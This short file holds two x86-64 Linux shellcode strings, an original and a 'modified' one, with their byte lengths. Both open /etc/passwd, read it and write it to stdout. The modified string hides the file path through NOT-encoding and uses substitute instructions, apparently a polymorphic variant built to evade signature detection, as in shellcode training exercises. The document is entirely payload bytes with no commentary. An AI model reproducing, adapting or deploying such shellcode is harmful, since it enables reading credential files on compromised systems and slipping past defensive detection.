

original_shellcode

"\xeb\x3f\x5f\x80\x77\x0b\x41\x48\x31\xc0\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x48\x8d\x34\x24\x48\x89\xc7\x48\x31\xd2\x66\xba\xff\x0f\x48\x31\xc0\x0f\x05\x48\x31\xff\x40\x80\xc7\x01\x48\x89\xc2\x48\x31\xc0\x04\x01\x0f\x05\x48\x31\xc0\x04\x3c\x0f\x05\xe8\xbc\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x41";

len 82

modified_shellcode

"\x4d\x31\xc9\x68\x73\x73\x77\x64\x48\xbf\xd0\x9a\x8b\x9c\xd0\xd0\x8f\x9e\x48\xf7\xd7\x57\x54\x5f\x49\xf7\xe1\x04\x02\x48\x31\xf6\x0f\x05\x66\x81\xec\xff\x0f\x54\x5e\x48\x97\x66\xba\xff\x0f\x41\x51\x58\x0f\x05\x41\x51\x5f\x40\x80\xc7\x01\x48\x92\x41\x51\x58\xfe\xc0\x0f\x05\x41\x51\x58\x04\x3c\x0f\x05";


len 75
